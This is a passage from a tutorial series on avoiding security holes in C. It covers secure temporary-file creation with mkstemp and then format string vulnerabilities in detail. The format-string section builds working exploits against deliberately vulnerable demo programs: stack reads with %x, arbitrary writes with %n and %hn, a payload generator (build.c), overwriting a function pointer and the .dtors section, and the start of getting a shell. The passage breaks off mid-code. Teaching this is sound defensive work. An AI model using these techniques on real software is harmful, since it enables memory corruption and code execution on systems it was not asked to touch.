function allows us to determine the permissions of a file at creation time. Thus, following a umask(077) call, the file will be open in mode 600 (read/write for the owner, no rights at all for the others).

Usually, the temporary file creation is done in three steps :

  1. unique name creation (random) ;
  2. file opening using O_CREAT | O_EXCL, with the most restrictive permissions;
  3. checking the result when opening the file and reacting accordingly (either retry or quit).

How do we create a temporary file? The

      #include <stdio.h>

      char *tmpnam(char *s);
      char *tempnam(const char *dir, const char *prefix);

functions return pointers to randomly created names.

The first function accepts a NULL argument, in which case it returns the address of a static buffer whose content changes at the next tmpnam(NULL) call. If the argument is an allocated string, the name is copied there, which requires a string of at least L_tmpnam bytes. Be careful with buffer overflows! The man page warns about problems when the function is used with a NULL parameter if _POSIX_THREADS or _POSIX_THREAD_SAFE_FUNCTIONS are defined.

The tempnam() function returns a pointer to a string. The dir directory must be “suitable” (the man page describes the right meaning of “suitable”). This function checks the file doesn’t exist before returning its name. However, once again, the man page doesn’t recommend its use, since “suitable” can have a different meaning according to the function implementations. Let’s mention that Gnome recommends its use in this way :

  char *filename;
  int fd;

  do {
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
  } while (fd == -1);

The loop used here reduces the risks but creates new ones. What would happen if the partition where you want to create the temporary file is full, or if the system has already opened the maximum number of files available at once? The open() call would fail on every iteration and the loop would never end.

The

       #include <stdio.h>

       FILE *tmpfile (void);

function creates a unique filename and opens it. This file is automatically deleted at closing time.

With GlibC-2.1.3, this function uses a mechanism similar to tmpnam() to generate the filename, and opens the corresponding descriptor. The file is then deleted, but Linux really removes it only when no resource uses it anymore, that is when the file descriptor is released by a close() system call.

  FILE * fp_tmp;

  if ((fp_tmp = tmpfile()) == NULL) {
    fprintf (stderr, "Can't create a temporary file\n");
    exit (EXIT_FAILURE);
  }

  /* ... use of the temporary file ... */

  fclose (fp_tmp);  /* real deletion from the system */

The simplest cases don’t require filename change nor transmission to another process, but only storage and data re-reading in a temporary area. We therefore don’t need to know the name of the temporary file but only to access its content. The tmpfile() function does it.

The man page says nothing, but the Secure-Programs-HOWTO doesn’t recommend it. According to the author, the specifications don’t guarantee that the file is created securely and he hasn’t been able to check every implementation. Despite this reservation, this function is the most efficient.

Last, the

       #include <stdlib.h>

       char *mktemp(char *template);
       int mkstemp(char *template);

functions create a unique name from a template made of a string ending with “XXXXXX“. These ‘X’s are replaced to get a unique filename.

According to versions, mktemp() replaces the first five ‘X’ with the Process ID (PID) … what makes the name rather easy to guess : only the last ‘X’ is random. Some versions allow more than six ‘X’.

mkstemp() is the recommended function in the Secure-Programs-HOWTO. Here is the method :

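#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* unlink() */
#include <sys/types.h>
#include <sys/stat.h>

/* Prints an error message and terminates the program. */
void failure(const char *msg) {
  fprintf(stderr, "%s\n", msg);
  exit(1);
}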

/*
 * Creates a temporary file and returns it.
 * This routine removes the filename from the filesystem thus
 * it doesn't appear anymore when listing the directory.
 */
FILE *create_tempfile(char *temp_filename_pattern)
{
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  /* Create file with restrictive permissions */
  old_mode = umask(077);
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  }
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's file descriptor");
  }
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  }
  return temp_file;
}

These functions show the problems concerning abstraction and portability. That is, the standard library functions are expected to provide features (abstraction)… but the way to implement them varies according to the system (portability). For instance, the tmpfile() function opens a temporary file in different ways (some versions don’t use O_EXCL), or mkstemp() handles a variable number of ‘X’ according to implementations.

Conclusion

We flew over most of the security problems caused by race conditions on a shared resource. Remember that you must never assume that two consecutive operations are processed without interruption unless the kernel guarantees it. While race conditions on files generate security holes, you must not neglect those involving other resources, such as variables shared between threads or memory segments shared using shmget(). Synchronization mechanisms (semaphores, for example) must be used to avoid hard to discover bugs.

Links

Avoiding security holes when developing an application – Part 4: format strings


Where is the danger ?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null terminated strings in a program. Where inside the program is not important here. This vulnerability is again about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough:

printf("%s", str);

However, a programmer can decide to save time and six bytes by writing only:

printf(str);

With “economy” in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he simply wanted to display without any change. However, this string will be parsed to look for formatting directives (%d, %g…). When such a directive is discovered, the corresponding argument is looked for in the stack.

We will start introducing the family of printf() functions. At least, we expect everyone knows them … but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the necessary information to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf() : they told me a lie !

Note for non-French residents: we have in our nice country a racing cyclist who pretended for months not to have taken dope while all the other members of his team admitted it. He claims that if he has been doped, he didn’t know it. So, a famous puppet show used the French sentence “on m’aurait menti !” which gave me the idea for this title.

Let us start with what we all learned in our programming handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it should be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

int main(void) {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
}

Running it displays:

>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a

The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which displays the ASCII value of a. On the other hand, the second printf() converts the integer variable i to the character whose ASCII code is 64, that is @.

Nothing new – everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision…). But there is another one never talked about: %n. Here is what the printf() man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important thing of this article: this format makes it possible to write into the variable that a pointer argument designates, even when used in a display function!

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
2:
3: int main(void) {
4:   char *buf = "0123456789";
5:   int n;
6:
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string “0123456789” which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
>>./printf1
0123456789
n = 10

Let’s slightly transform our program by replacing the instruction printf() line 7 with the following one:

7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the “buf=” constant string, contained in the format string itself).

So, we know the %n format counts every character written so far, including those coming from the format string itself. Moreover, as the printf2 program demonstrates, it counts even further:

/* printf2.c */

#include <stdio.h>
#include <string.h>   /* strlen() */

int main(void) {
  char buf[10];
  int n, x = 0;

  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
}

The snprintf() function is used to prevent buffer overflows. Since it writes at most sizeof buf bytes, we might expect the variable n to be 10:

>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100

Strange ? In fact, the %n format considers the amount of characters that should have been written. This example shows that truncating due to the size specification is ignored.

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>
#include <string.h>   /* strlen() */

int main(void) {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, (int) sizeof buf);
}

printf3 contains some differences compared to printf2:

  • the buffer size is reduced to 5 bytes
  • the precision in the format string is now set to 5;
  • the buffer content is finally displayed.

We get the following display:

>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)

The first two lines are not surprising. The last one illustrates the behavior of the printf() function :

  1. the format string is expanded according to the commands it contains (width, precision…), which provides the string “00000”;
  2. the variables are written where and how they should be, which is illustrated by the copying of x in our example. The string then looks like “01234”;
  3. last, sizeof buf - 1 bytes from this string are copied into the buf destination string (the last byte is kept for the terminating '\0'), which gives us “0123”.

This is not perfectly exact but reflects the general process. For more details, the reader should refer to the GlibC sources, and particularly vfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending this part, let’s add that it is possible to get the same results by writing the format string in a slightly different way. We previously used the format called precision (the dot ‘.’). Another combination of formatting instructions leads to an identical result: 0n, where n is the field width, and 0 means that the padding spaces should be replaced with 0 when the value does not fill the whole width.

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 2:
 3: int
 4: main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }

This program just copies an argument into the buffer character array. We take care not to overflow any important data (format strings are really more accurate than buffer overflows ;-)

>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)

It works as we expected :) Before going further, let’s examine what happens from the stack point of view while calling snprintf() at line 10.

Fig. 1 : the stack at the beginning of snprintf()

Figure 1 describes the state of the stack when the program enters the snprintf() function (we’ll see that it is not quite true … but this is just to give you an idea of what’s happening). We don’t care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located at %ebp and %ebp+4 contain the respective backups of the %ebp and %eip registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.

Lastly, the stack is topped off with the tmp array of 4 characters, the 64 bytes of the variable buffer and the i integer variable.

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() arguments, argv[1] appears in place of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting directives? Normally, snprintf() interprets them as they are … and there is no reason why it should act differently! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact, snprintf() grabs data from the stack! You can see that from our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the “123 ” string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the first 4 bytes of buffer. However, buffer contains the “123 ” string, which can be seen as the 0x20333231 (0x20=space, 0x31=’1’…) hexadecimal number. So, for each %x, snprintf() “jumps” 4 bytes further in buffer (4 because unsigned int takes 4 bytes on x86 processors). This variable acts as a double agent by:

  1. receiving the data written to the destination;
  2. providing input data for the format.

We can “climb up” the stack as long as our buffer contains bytes:

>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function that created the stack frame holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

There is an occasionally useful format for when it is necessary to swap the parameters (for instance, while displaying date and time). We add the m$ notation right after the %, where m is an integer >0. It gives the position of the variable to use in the arguments list (starting from 1):

/* explore.c */
#include <stdio.h>
#include <string.h>   /* memset(), strlen() */

int
main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, strlen(buf));
}

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit the contents of the buf variable. With %4\$x, we get the saved %ebp register, and then with the next %5\$x, the saved %eip register (a.k.a. the return address). The last 2 results presented here show the argc variable value and the address held in argv (remember that the char **argv declaration means that argv points to an array of addresses).

In short …

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return address of a function, another address… However, we saw at the beginning of this article that we could write using functions of the printf() type: doesn’t this look like a wonderful potential vulnerability?

First steps

Let’s go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)

We give as input string:

  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.

To determine the i variable address (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can see, i has a new value :) The given format string and the stack organization make the snprintf() call look like:

snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);

The first four bytes (containing the i address) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable which is at the beginning of the stack. Then, when the formatting instruction is %n, the address used is that of i, found at the beginning of buffer. Although the precision required is 496, snprintf() writes at most sixty bytes (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary, and is just used to manipulate the “byte counter”. We have seen that the %n format saves the number of bytes that should have been written. This value is 496, to which we have to add the 4 bytes of the i address at the beginning of buffer. Therefore, we have counted 500 bytes. This value is written at the next address found in the stack, which is the address of i.

We can go even further with this example. To change i, we needed to know its address … but sometimes the program itself provides it:

/* swap.c */
#include <stdio.h>

int main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  int *addr_cpt1 = &cpt1;   /* pointers that %n will find on the stack */
  int *addr_cpt2 = &cpt2;

  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
}

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
AAAA
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
AAAA
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1 or cpt2. The %n format expects an address, which is why we can’t act directly on the variables (i.e. using %3$n (cpt2) or %4$n (cpt1)) but have to go through pointers. The latter are “fresh meat” with enormous possibilities for modification.

Variations on the same topic

The examples previously presented come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won’t get the same results on your own box. Indeed, the functions of the *printf() type change according to the glibc and the compilers do not carry out the same operations at all.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), strlen() */

int main(int argc, char **argv) {

  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }

  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
}

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1 : Variations around glibc
Compiler     | glibc     | Display
gcc-2.95.3   | 2.1.3-16  | buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66 | 2.1.3-22  | buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96     | 2.1.92-14 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96     | 2.2-12    | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

Next in this article, we will continue to use egcs-2.91.66 and the glibc-2.1.3-22 , but don’t be surprised if you note differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, …): we just have to say where and what to write, and %n does the job for us.

The vulnerable program

You can exploit a format bug in different ways. P. Bouchareine’s article (Format string vulnerability) shows how to overwrite the return address of a function, so we’ll show something else.

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();
}

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);

  exit(vuln(argv[1]));
}

int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}

int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffer variable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128 MB). Not all computers can afford such a use of memory … but the one we are using can :) It lasts around 20 seconds on a dual Pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we already have written 4 bytes from the address of ptrf, so we still have to write 134514260-4=134514256 bytes). At last, we write the wanted value in the given address (%3$n).

Memory problems: divide and conquer

However, as we mentioned, it isn’t always possible to use 128 MB buffers. The %n format expects a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int (only 2 bytes) thanks to the %hn instruction. We thus cut the integer we want to write into two parts. The largest value to write will then fit in 0xffff bytes (65535 bytes). Thus in the previous example, we transform the operation “writing 0x8048654 at the 0xbffff5d4 address” into two successive operations:

  • writing 0x8654 at the 0xbffff5d4 address
  • writing 0x0804 at the 0xbffff5d4+2=0xbffff5d6 address

The second write operation takes place on the high bytes of the integer, which explains the offset of 2 bytes.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smallest value between the two. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 – 0x0804). Each %hn placed right after will record the right amount of bytes.

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"

The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.

/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value,
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128;
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);

  /* let's build */
  if (valh < vall) {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */
         where,               /* the %hn for the high part */

         vall-valh,           /* set the value for the second %hn */
         where+1              /* the %hn for the low part */
         );

  } else {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the low part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the high part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         vall-8,              /* set the value for the first %hn */
         where+1,             /* the %hn for the low part */

         valh-vall,           /* set the value for the second %hn */
         where                /* the %hn for the high part */
         );
  }
  return buf;
}

int
main(int argc, char **argv) {

  char *buf;

  if (argc < 4)
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* address */
          strtoul(argv[2], NULL, 16),  /* value */
          atoi(argv[3]));              /* offset */

  fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let’s check what we get now, without any memory troubles.

First, our simple example lets us guess the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same: 3. Since our program was written to show what happens, we already have all the other information we need: the addresses of ptrf and accesForbidden(). We build our buffer accordingly:

>>./vuln `./build 0xbffff5d4 0x8048664 3`
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since the format string is longer than in the previous example, the stack moved: ptrf went from 0xbffff5d4 to 0xbffff5b4. Our values need to be adjusted:

>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on overwriting the return address of a function. You then have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOPs). You don’t need any of this with format bugs, and you are no longer restricted to overwriting the return address.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, it contains a constructor section (named .ctors) and a destructor section (named .dtors). These sections hold pointers to functions to be run before entering main() and after exiting it, respectively.

/* cdtors.c */

#include <stdio.h>

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");
  return 0;
}

void start(void) {
  printf("in start()\n");
}

void end(void) {
  printf("in end()\n");
}

Our small program shows that mechanism:

>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()

Each one of these sections is built in the same way:

>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............

We check that the indicated addresses match those of our functions (note: the preceding objdump command shows the addresses in little endian):

>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end

So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to find where these sections are located in memory, which is really easy when you have the binary at hand ;-) Simply use objdump as we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........

Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with the address of the function we want to execute. If the section is empty, we just have to overwrite the 0x00000000 that marks its end. This will cause a segmentation fault: since the program no longer finds this 0x00000000, it takes the next value as the address of a function, which it probably is not.

In fact, the only interesting section is the destructor section (.dtors): the constructors in .ctors have already run by the time we can do anything. Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the 0xffffffff):

  • if there is no address there, we overwrite the 0x00000000;
  • otherwise, the first function to be executed will be ours.

Let’s go back to our example. We replace the 0x00000000 in section .dtors, located at 0x8049848 = 0x8049844 + 4, with the address of the accesForbidden() function, which we already know (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine: main(), helloWorld() and then exit. The destructor is then called. The .dtors section now starts with the address of accesForbidden(). Then, since there is no other real function address, the expected core dump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

  • how to explore the stack within reasonable limits (in fact, theoretically, there is no limit, but it gets rather painful rather quickly to recover the words on the stack one by one);
  • how to write the expected value to the right address.

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb, i;

  if (argc < 2)
    return EXIT_FAILURE;
  nb = atoi(argv[1]);

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;

  /* three slots: program name, counter, terminating NULL */
  arg    = (char **) malloc(sizeof(char *) * 3);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;

  /* printings */
  printf("*** argv %d ***\n", nb);
